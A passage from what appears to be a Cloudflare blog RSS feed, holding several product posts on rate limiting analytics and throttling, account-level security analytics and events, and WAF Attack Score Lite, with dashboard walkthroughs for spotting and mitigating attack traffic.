            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7iXu3aai6ibY25UWhtYUT1/9bef2b03e884668efbba3d8251cd4882/image2-1.png" />
            
            </figure><p>You can use the slider to determine the impact of a rule with different thresholds. How many clients would have been caught by the rule and rate limited? Can I visually identify abusers with above-average rate vs. the long tail of average users? This information will guide you in assessing what’s the most appropriate rate for the selected filter.</p>
    <div>
      <h3>Using Rate Limit Analysis to define rate thresholds</h3>
      <a href="#using-rate-limit-analysis-to-define-rate-thresholds">
        
      </a>
    </div>
    <p>It takes a few minutes to build your rate limit rule now. Let’s apply this to one of the common use cases where we identify /login endpoint and create a rate limit rule based on the IP with a logging action.</p><p><b>Define a scope and rate.</b></p><ul><li><p>In the <i>HTTP requests</i> tab (the default view), start by selecting a specific time period. If you’re looking for the normal rate distribution you can specify a period with non-peak traffic. Alternatively, you can analyze the rate of offending users by selecting a period when an attack was carried out.</p></li></ul><div>
  
</div>
<p></p><ul><li><p>Using the filters in the top statistics, select a specific endpoint (e.g., <i>/login</i>). We can also focus on non-automated/human traffic using the bot score quick filter on the right sidebar or the filter button on top of the chart. In the <i>Rate limiting Analysis</i> tab, you can choose the characteristic (JA3, IP, or both) and duration (1 min, 5 mins, or 1 hour) for your rate limit rule. At this point, moving the dotted line up and down can help you choose an appropriate rate for the rule. JA3 is only available to customers using Bot Management.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ZC9jNROj5C5X6mHImu8zf/88b11e610fafe2504665dad8c22b3da6/image5-2.png" />
            
            </figure><ul><li><p>Looking at the distribution, we can exclude any IPs or ASNs that might be known to us, to have a better visual on end user traffic. One way to do this is to filter out the outliers right before the long tail begins. A rule with this setting will block the IPs/JA3 with a higher rate of requests.</p></li></ul><p><b>Validate your rate.</b> You can validate the rate by repeating this process but selecting a portion of traffic where you know there was an attack or traffic peak. The rate you've chosen should block the outliers during the attack and allow traffic during normal times. In addition to that, looking at the sampled logs can be helpful in verifying the fingerprints and filters chosen.</p><p><b>Create a rule.</b> Selecting “Create rate limit rule” will take you to the rate limiting tab in the WAF with your filters pre-populated.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7bxY562ESZk6pzJYrPBvuF/35d5d626a4ee5b286dd0c087c74d756e/image7-2.png" />
            
            </figure><p><b>Choose your action and behavior in the rule.</b> Depending on your needs you can choose to log, challenge, or block requests exceeding the selected threshold. It’s often a good idea to first deploy the rule with a log action to validate the threshold and then change the action to block or challenge when you are confident with the result. With every action, you can also choose between two behaviors: fixed action or throttle. Learn more about the difference in the next section.</p>
    <div>
      <h2>Introducing the new throttle behavior</h2>
      <a href="#introducing-the-new-throttle-behavior">
        
      </a>
    </div>
    <p>Until today, the only available behavior for Rate Limiting has been <i>fixed action,</i> where an action is triggered for a selected time period (also known as timeout). For example, did the IP 192.0.2.23 exceed the rate of 20 requests per minute? Then block (or log) all requests from this IP for, let’s say, 10 minutes.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2VKfUoWJSGACGOz50fEsof/00da159c12b659159a2f883b81988a4d/Screenshot-2023-09-19-at-11.16.42.png" />
            
            </figure><p>In some situations, this type of penalty is too severe and risks affecting legitimate traffic. For example, if a device in a corporate network (think about NAT) exceeds the threshold, all devices sharing the same IP will be blocked outright.</p><p>With <i>throttling</i>, rate limiting selectively drops requests to maintain the rate within the specified threshold. It’s like a leaky bucket behavior (with the only difference that we do not implement a queuing system). For example, throttling a client to 20 requests per minute means that when a request comes from this client, we look at the last 60 seconds and see if (on average) we have received less than 20 requests. If this is true, the rule won’t perform any action. If the average is already at 20 requests then we will take action on that request. When another request comes in, we will check again. Since some time has passed the average rate might have dropped, making room for more requests.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5nguPmj1apYY1lehsrbybF/3b954929b65a06a4e509ddc67689a874/Screenshot-2023-09-19-at-11.17.18.png" />
            
            </figure><p>Throttling can be used with all actions: block, log, or challenge. When creating a rule, you can select the behavior after choosing the action.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/19vPKFMr4S8VXOGtUkUXTK/822e2c7b704fa0f03fa86c6044bfd288/Screenshot-2023-09-19-at-11.17.42.png" />
            
            </figure><p>When using any challenge action, we recommend using the <i>fixed</i> <i>action</i> behavior. As a result, when a client exceeds the threshold we will challenge all requests until a challenge is passed. The client will then be able to reach the origin again until the threshold is breached again.</p><p>Throttle behavior is available to Enterprise rate limiting <a href="https://developers.cloudflare.com/waf/rate-limiting-rules/#availability">plans</a>.</p>
    <div>
      <h2>Try it out!</h2>
      <a href="#try-it-out">
        
      </a>
    </div>
    <p>Today we are introducing a new Rate Limiting analytics experience along with the throttle behavior for all Rate Limiting users on Enterprise plans. We will continue to work actively on providing a better experience to save our customers' time. Log in to the dashboard, try out the new experience, and let us know your feedback using the feedback button located on the top right side of the Analytics page or by reaching out to your account team directly.</p> ]]></content:encoded>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Rate Limiting]]></category>
            <category><![CDATA[Analytics]]></category>
            <guid isPermaLink="false">CZ5Zxo3gP0GccJdEtAmcY</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Daniele Molteni</dc:creator>
        </item>
        <item>
            <title><![CDATA[Account Security Analytics and Events: better visibility over all domains]]></title>
            <link>https://blog.cloudflare.com/account-security-analytics-and-events/</link>
            <pubDate>Sat, 18 Mar 2023 17:00:00 GMT</pubDate>
            <description><![CDATA[ Revealing Account Security Analytics and Events, new eyes on your account in Cloudflare dashboard to give holistic visibility. No matter how many zones you manage, they are all there! ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/hkEsUWDVJmPQ7DAieHQCS/6571ab358294597bd14e95b5f1feb5ed/Account-level-Security-Analytics-and-Security-Events_-better-visibility-and-control-over-all-account-zones-at-once.png" />
            
            </figure><p>Cloudflare offers many security features like <a href="https://developers.cloudflare.com/waf/">WAF</a>, <a href="https://developers.cloudflare.com/bots/">Bot management</a>, <a href="https://developers.cloudflare.com/ddos-protection/">DDoS</a>, <a href="https://developers.cloudflare.com/cloudflare-one/">Zero Trust</a>, and more! This suite of products are offered in the form of rules to give basic protection against common vulnerability attacks. These rules are usually configured and monitored per domain, which is very simple when we talk about one, two, maybe three domains (or what we call in Cloudflare’s terms, “zones”).</p>
    <div>
      <h3>The zone-level overview sometimes is not time efficient</h3>
      <a href="#the-zone-level-overview-sometimes-is-not-time-efficient">
        
      </a>
    </div>
    <p>If you’re a Cloudflare customer with tens, hundreds, or even thousands of domains under your control, you’d spend hours going through these domains one by one, monitoring and configuring all security features. We know that’s a pain, especially for our Enterprise customers. That’s why last September we announced the <a href="/account-waf/">Account WAF</a>, where you can create one security rule and have it applied to the configuration of all your zones at once!</p><p>Account WAF makes it easy to deploy security configurations. Following the same philosophy, we want to empower our customers by providing visibility over these configurations, or even better, visibility on all HTTP traffic.</p><p>Today, Cloudflare is offering holistic views on the security suite by launching Account Security Analytics and Account Security Events. Now, across all your domains, you can monitor traffic, get insights quicker, and save hours of your time.</p>
    <div>
      <h3>How do customers get visibility over security traffic today?</h3>
      <a href="#how-do-customers-get-visibility-over-security-traffic-today">
        
      </a>
    </div>
    <p>Before today, to view account analytics or events, customers either used to access each zone individually to check the events and analytics dashboards, or used zone <a href="https://developers.cloudflare.com/analytics/graphql-api/">GraphQL Analytics API</a> or logs to collect data and send them to their preferred storage provider where they could collect, aggregate, and plot graphs to get insights for all zones under their account — in case ready-made dashboards were not provided.</p>
    <div>
      <h3>Introducing Account Security Analytics and Events</h3>
      <a href="#introducing-account-security-analytics-and-events">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gWJhl65y6sUNRHNaZjwqt/d2a107ab79c0a3da65c4721a1b48fa74/Screenshot-2023-03-17-at-9.57.13-AM.png" />
            
            </figure><p>The new views are security focused, data-driven dashboards — similar to zone-level views, both have  similar data like: sampled logs and the top filters over many source dimensions (for example, IP addresses, Host, Country, ASN, etc.).</p><p>The main difference between them is that Account Security Events focuses on the current configurations on every zone you have, which makes reviewing mitigated requests (rule matches) easy. This step is essential in distinguishing between actual threats from false positives, along with maintaining optimal security configuration.</p><p>Part of the Security Events power is showing Events “by service” listing the security-related activity per security feature (for example, <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a>, Firewall Rules, API Shield) and Events “by Action” (for example, allow, block, challenge).</p><p>On the other hand, Account Security Analytics view shows a wider angle with all HTTP traffic on all zones under the account, whether this traffic is mitigated, i.e., the security configurations took an action to prevent the request from reaching your zone, or not mitigated. This is essential in fine-tuning your security configuration, finding possible false negatives, or onboarding new zones.</p><p>The view also provides quick filters or insights of what we think are interesting cases worth exploring for ease of use. Many of the view components are similar to zone level <a href="/security-analytics/">Security Analytics</a> that we introduced recently.</p><p>To get to know the components and how they interact, let’s have a look at an actual example.</p>
    <div>
      <h3>Analytics walk-through when investigating a spike in traffic</h3>
      <a href="#analytics-walk-through-when-investigating-a-spike-in-traffic">
        
      </a>
    </div>
    <p>Traffic spikes happen to many customers’ accounts; to investigate the reason behind them, and check what’s missing from the configurations, we recommend starting from Analytics as it shows mitigated and non-mitigated traffic, and to revise the mitigated requests to double check any false positives then Security Events is the go to place. That’s what we’ll do in this walk-through starting with the Analytics, finding a spike, and checking if we need further mitigation action.</p><p><b>Step 1:</b> To navigate to the new views, sign into the Cloudflare dashboard and select the account you want to monitor. You will find <b>Security Analytics</b> and <b>Security Events</b> in the sidebar under <b>Security Center.</b></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6GQ2Z3yAa1OehelJegPHZU/ffc7db3bde4a6976ed94e6eab597458c/pasted-image-0--8--2.png" />
            
            </figure><p><b>Step 2:</b> In the Analytics dashboard, if you had a big spike in the traffic compared to the usual, there’s a big chance it's a layer 7 DDoS attack. Once you spot one, zoom into the time interval in the graph.</p><div></div>
<i>Zooming into a traffic spike on the timeseries scale</i><br /><p>By Expanding the top-Ns on top of the analytics page we can see here many observations:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5XDngTA5PHz7hc0O8f7RJ8/5bfe5659e3eafa42689d998f2de886a3/pasted-image-0--9--1.png" />
            
            </figure><p>We can confirm it’s a DDoS attack as the peak of traffic does not come from one single IP address, It’s distributed over multiple source IPs. The “edge status code” indicates that there’s a rate limiting rule applied on this attack and it’s a GET method over HTTP/2.</p><p>Looking at the right hand side of the analytics we can see “Attack Analysis” indicating that these requests were clean from <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">XSS</a>, SQLi, and common RCE attacks. The Bot Analysis indicates it’s an automated traffic in the Bot Scores distribution; these two products add another layer of intelligence to the investigation process. We can easily deduce here that the attacker is sending clean requests through high volumetric attack from multiple IPs to take the web application down.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3mBN0yDIQo4aK0HAXCO5Yb/98fe973514f449147b3171e579c2dbce/pasted-image-0--10--1.png" />
            
            </figure><p><b>Step 3:</b> For this attack we can see we have rules in place to mitigate it, with the visibility we get the freedom to fine tune our configurations to have better security posture, if needed. we can filter on this attack fingerprint, for instance: add a filter on the referer `<a href="http://www.example.com`">www.example.com`</a> which is receiving big bulk of the attack requests, add filter on path equals `/`, HTTP method, query string, and a filter on the automated traffic with Bot score, we will see the following:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6bI1AAaTSFbA7nPxvx4lZn/2f8197708c7dc3ac8d842ff2c003b4eb/pasted-image-0--11-.png" />
            
            </figure><p><b>Step 4:</b> Jumping to Security Events to zoom in on our mitigation actions in this case, spike fingerprint is mitigated using two actions: Managed Challenge and Block.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6JuvFbzYoI01oHDIrCh7ze/3e21d9d444699434a28e25eea8422423/pasted-image-0--12-.png" />
            
            </figure><p>The mitigation happened on: Firewall rules and DDoS configurations, the exact rules are shown in the top events.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/20ANCsBgB0TowOniXpMl0E/1e4445f96e05af157c3174314422513b/pasted-image-0--13-.png" />
            
            </figure>
    <div>
      <h3>Who gets the new views?</h3>
      <a href="#who-gets-the-new-views">
        
      </a>
    </div>
    <p>Starting this week all our customers on Enterprise plans will have access to Account Security Analytics and Security Events. We recommend having Account Bot Management, WAF Attack Score, and Account WAF to have access to the full visibility and actions.</p>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>The new Account Security Analytics and Events encompass metadata generated by the Cloudflare network for all domains in one place. In the upcoming period we will be providing a better experience to save our customers' time in a simple way. We're currently in beta, log into the dashboard, check out the views, and let us know your feedback.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Dashboard]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">7lBffZk4kfTbrZ48l1NMo8</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Nick Downie</dc:creator>
        </item>
        <item>
            <title><![CDATA[Announcing WAF Attack Score Lite and Security Analytics for business customers]]></title>
            <link>https://blog.cloudflare.com/waf-attack-score-for-business-plan/</link>
            <pubDate>Wed, 15 Mar 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ We are making the machine learning empowered WAF and Security analytics view available to our Business plan customers, to help detect and stop attacks before they are known ]]></description>
            <content:encoded><![CDATA[ <p></p><p>In December 2022 we announced the general availability of the <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>. The initial release was for our Enterprise customers, but we always had the belief that this product should be enabled for more users. Today we’re announcing “WAF Attack Score Lite” and “Security Analytics” for our Business plan customers.</p>
    <div>
      <h3>Looking back on “What is WAF Attack Score and Security Analytics?”</h3>
      <a href="#looking-back-on-what-is-waf-attack-score-and-security-analytics">
        
      </a>
    </div>
    <p>Vulnerabilities on the Internet appear almost on a daily basis. The <a href="https://cve.mitre.org/">CVE</a> (common vulnerabilities and exposures) program has a list with over 197,000 records to track disclosed vulnerabilities.</p><p>That makes it really hard for web application owners to harden and update their system regularly, especially when we talk about critical libraries and the exploitation damage that can happen in case of information leak. That’s why web application owners tend to use <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAFs (Web Application Firewalls)</a> to protect their online presence.</p><p>Most WAFs use signature-based detections, which are rules created based on specific attacks that we know about. The signature-based method is very fast, has a low rate of false positives (these are the requests that are categorized as attack when they are actually legitimate), and is very efficient with most of the attack categories we know. However, they sometimes have a blind spot when a new attack happens, often called <a href="https://en.wikipedia.org/wiki/Zero-day_(computing)?cf_target_id=E4C6647B3175407AE832B11B197C13AB">zero-day</a> attacks. As soon as a new vulnerability is found, our security analysts take fast action to stop it in a matter of hours and update the <a href="https://developers.cloudflare.com/waf/managed-rules/">WAF Managed Rules</a>, yet we want to protect our customers during this time as well.</p><p>This is the main reason Cloudflare created a complementary feature to the WAF <a href="https://developers.cloudflare.com/waf/managed-rules/">managed rules</a>: a smart machine learning layer to help detect unknown attacks, and protect customers even during the time gap until rules are updated.</p>
    <div>
      <h3>Early detection + Powerful mitigation = Safer Internet</h3>
      <a href="#early-detection-powerful-mitigation-safer-internet">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6QVg4BUsujsYrq75VAHZiL/d3b594dfebf2aba889d9ab521b916413/image2-15.png" />
            
            </figure><p>The performance of any <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning</a> drastically depends on the data it was trained on. Our machine learning uses a supervised model that was trained over hundreds of millions of requests generated by WAF Managed Rules, data varies between clean and malicious, some were blended with fuzzy techniques to enable catching similar patterns as covered in our blog “<a href="/data-generation-and-sampling-strategies/">Improving the accuracy of our machine learning WAF</a>”. At the moment, there are three types of attacks our machine learning model is optimized to find: SQL Injection (SQLi), <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">Cross Site Scripting (XSS)</a>, and a wide range of Remote Code Execution (RCE) attacks such as shell injection, PHP injection, Apache Struts type compromises, Apache log4j, and similar attacks that result in RCE.</p><p>And the reason why we started with them is based on Cloudflare’s <a href="/application-security-2023/">Application Security Report</a>. These categories represent more than 24% of the mitigated layer 7 attacks over the last year in our WAF, therefore more prone to exploitations.</p><p>In the full Enterprise WAF Attack Score version we offer more granularity on the attack categories and we provide scores for each class where they can be configured freely per domain.</p>
    <div>
      <h3>WAF Attack Score Lite Features for Business Plan</h3>
      <a href="#waf-attack-score-lite-features-for-business-plan">
        
      </a>
    </div>
    <p>WAF Attack Score Lite and the Security Analytics view offer three main functions:</p><p><b>1- Attack detection:</b> This happens through inspecting every incoming HTTP request, bucketing or classifying the requests into 4 types: Attacks, Likely Attacks, Likely Clean and Clean. At the moment there are three types of attacks our machine learning model is optimized to find: SQL Injection (SQLi), Cross Site Scripting (XSS), and a wide range of Remote Code Execution (RCE) attacks.</p><p><b>2- Attack mitigation:</b> The ability to create WAF Custom Rules or WAF Rate Limiting Rules to mitigate requests. We’re exposing a new field cf.waf.score.class that  has preset values: attack, likely_attack, likely_clean and clean. customers can use this field in rules expressions and apply needed actions.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/70J5HfmuVRknKJ7iYJWfH2/7b370b949c9cc3c7d2d9c88d039700e0/Screenshot-2023-03-09-at-22.15.20.png" />
            
            </figure><p><b>3- Visibility over your entire traffic:</b> Security Analytics is a new dashboard currently in beta. It provides a comprehensive view across all your HTTP traffic, which displays all requests whether they match rules or not. Security Analytics is a great tool for investigating false negatives and hardening your security configurations. Security Events is still available in <b>(Security &gt; Events)</b> and Security Analytics is available in a separate tab <b>(Security &gt; Analytics)</b>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4raUfutGDBtIejiloAbafc/24621d78251095de0396d33dd0eea1cc/pasted-image-0-9.png" />
            
            </figure>
    <div>
      <h3>Deployment and configuration</h3>
      <a href="#deployment-and-configuration">
        
      </a>
    </div>
    <p>In order to enable WAF Attack Score Lite and Security Analytics, you don’t need to take any action. The HTTP machine learning inspection rollout will start today, and Security Analytics will appear automatically to all Business plan customers by the time the rollout is completed in the upcoming weeks.</p><p>It’s worth mentioning that having the detection on and viewing the attack analysis in Security Analytics does not mean you’re blocking traffic. It only offers insights and provides the freedom to create rules and mitigate the desired requests. Creating a rule to block or challenge bad traffic is needed to take effect.</p>
    <div>
      <h3>A common use case</h3>
      <a href="#a-common-use-case">
        
      </a>
    </div>
    <p>Consider an attacker executing an attack using automated web requests to manipulate or disrupt web applications. One of the best ways to identify this type of traffic and mitigate these requests is by combining bot score with WAF Attack Score.</p><p>1- Go to the Security Analytics dashboard under <b>Security &gt; Analytics</b>. On the right-hand side the Attack Analysis indicates the attack class. In this case, I can select “Attack” to apply a single filter, or use the quick filters under <b>Insights</b> to propagate multiple filters at once. In addition to the attack class, I can also select the Bot “Automated” filter.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/KlXR4rLThAGb3qmUUFU9i/483db68c4de0d993860841df1d79185a/pasted-image-0--1--5.png" />
            
            </figure><p>2- After filtering, Security Analytics provides the capability of scrolling down to see the logs and validate the results:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1wuVzh2HNPEH76qnFPfhVg/7bfd3a508245e5d1bebf55a08b74729d/pasted-image-0--2--3.png" />
            
            </figure><p>3- Once the selected requests are confirmed, I can select the <b>Create WAF Custom Rules</b> option which will direct me to the Security Events with the pre-assigned filters to deploy a rule. In this case, I want to challenge the requests matched by the rule:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3BvqWU3mvDlOT3Zpq0nHfg/7938183b46471442c49cce6c19428dde/pasted-image-0--3--3.png" />
            
            </figure><p>And voila! You have a new rule that challenges traffic matching any automated attack variation.</p>
    <div>
      <h3>Next steps</h3>
      <a href="#next-steps">
        
      </a>
    </div>
    <p>We have been working hard to provide maximum security and visibility for all our customers. This is only one step on this road! We will keep adding more product-focused analytics, and providing additional security against unknown attacks. Try it out, create a rule, and don’t hesitate to contact our sales team if you need the full version of WAF Attack Score.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <guid isPermaLink="false">5GzyVBcAZXi7cH3YQKU1SL</guid>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[New! Security Analytics provides a comprehensive view across all your traffic]]></title>
            <link>https://blog.cloudflare.com/security-analytics/</link>
            <pubDate>Fri, 09 Dec 2022 14:00:00 GMT</pubDate>
            <description><![CDATA[ Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated. ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/fqA2JqcTEUftqWAiKfPHt/14eaa1a9b78a1785a3bd449a776eb204/unnamed-1.png" />
            
            </figure><p>An application proxying traffic through Cloudflare benefits from a wide range of easy to use security features including <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a>, Bot Management and DDoS mitigation. To understand if traffic has been blocked by Cloudflare we have built a powerful <a href="/new-firewall-tab-and-analytics/">Security Events</a> dashboard that allows you to examine any mitigation events. Application owners often wonder though what happened to the rest of their traffic. Did they block all traffic that was detected as malicious?</p><p>Today, along with our announcement of the <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>, we are also launching our new Security Analytics.</p><p>Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated.</p>
    <div>
      <h2>Detect then mitigate</h2>
      <a href="#detect-then-mitigate">
        
      </a>
    </div>
    <p>Imagine you just onboarded your application to Cloudflare and without any additional effort, each HTTP request is analyzed by the Cloudflare network. Analytics are therefore enriched with attack analysis, bot analysis and any other security signal provided by Cloudflare.</p><p>Right away, without any risk of causing false positives, you can view the entirety of your traffic to explore what is happening, when and where.</p><p>This allows you to dive straight into analyzing the results of these signals, shortening the time taken to deploy active blocking mitigations and boosting your confidence in making decisions.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2gYype09S9vHFehn1Ltvln/a333ca9cdf3dd7397e9a012dbd758134/image6-1.png" />
            
            </figure><p>We are calling this approach “<i>detect then mitigate”</i> and we have already received very positive feedback from early access customers.</p><p>In fact, Cloudflare’s Bot Management has been <a href="/introducing-bot-analytics/">using this model</a> for the past two years. We constantly hear feedback from our customers that with greater visibility, they have a high confidence in our bot scoring solution. To further support this new way of securing your web applications and bringing together all our intelligent signals, we have designed and developed the new Security Analytics which starts bringing signals from the WAF and other security products to follow this model.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4GSZTeBSY0shIKt5dTE66k/fd166416500386e0549c6e7ad460bc8d/image4-6.png" />
            
            </figure>
    <div>
      <h2>New Security Analytics</h2>
      <a href="#new-security-analytics">
        
      </a>
    </div>
    <p>Built on top of the success of our analytics experiences, the new Security Analytics employs existing components such as top statistics, in-context quick filters, with a new page layout allowing for rapid exploration and validation. Following sections will break down this new page layout forming a high level workflow.</p><p>The key difference between Security Analytics and Security Events, is that the former is based on HTTP requests which covers visibility of your entire site’s traffic, while Security Events uses a different dataset that visualizes whenever there is a match with any active security rule.</p>
    <div>
      <h3>Define a focus</h3>
      <a href="#define-a-focus">
        
      </a>
    </div>
    <p>The new Security Analytics visualizes the dataset of sampled HTTP requests based on your entire application, same as <a href="/introducing-bot-analytics/">bots analytics</a>. When validating the “<i>detect then mitigate”</i> model with selected customers, a common behavior observed is to use the top N statistics to quickly narrow down to either obvious anomalies or certain parts of the application. Based on this insight, the page starts with selected top N statistics covering both request sources and request destinations, allowing expanding to view all the statistics available. Questions like “How well is my application admin’s area protected?” lands at one or two quick filter clicks in this area.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/eVviZy7T8NtFwd5igw3Y7/a573e8bc96b2d8bc788ff483c1dc4189/image2-8.png" />
            
            </figure>
    <div>
      <h3>Spot anomalies in trends</h3>
      <a href="#spot-anomalies-in-trends">
        
      </a>
    </div>
    <p>After a preliminary focus is defined, the core of the interface is dedicated to plotting trends over time. The time series chart has proven to be a powerful tool to help spot traffic anomalies, also allowing plotting based on different criteria. Whenever there is a spike, it is likely an attack or attack attempt has happened.</p><p>As mentioned above, different from <a href="/new-firewall-tab-and-analytics/">Security Events</a>, the dataset used in this page is HTTP requests which includes both mitigated and not mitigated requests. By <a href="/application-security/#definitions">mitigated requests</a> here, we mean “any HTTP request that had a ‘terminating’ action applied by the Cloudflare platform”. The rest of the requests that have not been mitigated are either served by Cloudflare’s cache or reaching the origin. In the case such as a spike in not mitigated requests but flat in mitigated requests, an assumption could be that there was an attack that did not match any active WAF rule. In this example, you can one click to filter on not mitigated requests right in the chart which will update all the data visualized on this page supporting further investigations.</p><p>In addition to the default plotting of not mitigated and mitigated requests, you can also choose to plot trends of either attack analysis or bot analysis allowing you to spot anomalies for attack or bot behaviors.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/68ZPoNtii7Si5DF06pxVVY/cec0589f2c78dc23cc9501cdb070bfa2/image7-2.png" />
            
            </figure>
    <div>
      <h3>Zoom in with analysis signals</h3>
      <a href="#zoom-in-with-analysis-signals">
        
      </a>
    </div>
    <p>One of the most loved and trusted analysis signals by our customers is the bot score. With the latest addition of <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a> and <a href="https://developers.cloudflare.com/waf/about/content-scanning/">content scanning</a>, we are bringing them together into one analytics page, helping you further zoom into your traffic based on some of these signals. The combination of these signals enables you to find answers to scenarios not possible until now:</p><ul><li><p>Attack requests made by (definite) automated sources</p></li><li><p>Likely attack requests made by humans</p></li><li><p>Content uploaded with/without malicious content made by bots</p></li></ul><p>Once a scenario is filtered on, the data visualization of the entire page including the top N statistics, HTTP requests trend and sampled log will be updated, allowing you to spot any anomalies among either one of the top N statistics or the time based HTTP requests trend.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6L7LxXT1BLhWp71Im6heox/d8e9155a5e0e81f1bf0236a272509d0a/image3-3.png" />
            
            </figure>
    <div>
      <h3>Review sampled logs</h3>
      <a href="#review-sampled-logs">
        
      </a>
    </div>
    <p>After zooming into a specific part of your traffic that may be an anomaly, sampled logs provide a detailed view to verify your finding per HTTP request. This is a crucial step in a security study workflow backed by the high engagement rate when examining the usage data of such logs viewed in Security Events. While we are adding more data into each log entry, the expanded log view becomes less readable over time. We have therefore redesigned the expanded view, starting with how Cloudflare responded to a request, followed by our analysis signals, lastly the key components of the raw request itself. By reviewing these details, you validate your hypothesis of an anomaly, and if any mitigation action is required.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3gJjGLYzonj0aPVZLIKC6S/9cc34a61775198999e4f1eb8c4dd90f6/image5-3.png" />
            
            </figure>
    <div>
      <h3>Handy insights to get started</h3>
      <a href="#handy-insights-to-get-started">
        
      </a>
    </div>
    <p>When testing the prototype of this analytics dashboard internally, we learnt that the power of flexibility yields the learning curve upwards. To help you get started mastering the flexibility, a handy <i>insights</i> panel is designed. These insights are crafted to highlight specific perspectives into your total traffic. By a simple click on any one of the insights, a preset of filters is applied zooming directly onto the portion of your traffic that you are interested in. From here, you can review the sampled logs or further fine tune any of the applied filters. This approach has been proven with further internal studies of a highly efficient workflow that in many cases will be your starting point of using this dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1l8PBc150OLKligyn93h76/bc692e61e0f0d8c11ec1719c3195a169/image1-11.png" />
            
            </figure>
    <div>
      <h2>How can I get it?</h2>
      <a href="#how-can-i-get-it">
        
      </a>
    </div>
    <p>The new Security Analytics is being gradually rolled out to all Enterprise customers who have purchased the new Application Security Core or Advanced Bundles. We plan to roll this out to all other customers in the near future. This new view will be alongside the existing Security Events dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Q5OP1vAN2KM82LN4vBqp2/b7944b44d8d7bb03baa8b39909c72f16/image8-2.png" />
            
            </figure>
    <div>
      <h2>What’s next</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We are still at an early stage moving towards the “<i>detect then mitigate”</i> model, empowering you with greater visibility and intelligence to better protect your web applications. While we are working on enabling more detection capabilities, please share your thoughts and feedback with us to help us improve the experience. If you want to get access sooner, reach out to your account team to get started!</p> ]]></content:encoded>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Analytics]]></category>
            <guid isPermaLink="false">38y228bpRNFVIIfHyptrzx</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Nick Downie</dc:creator>
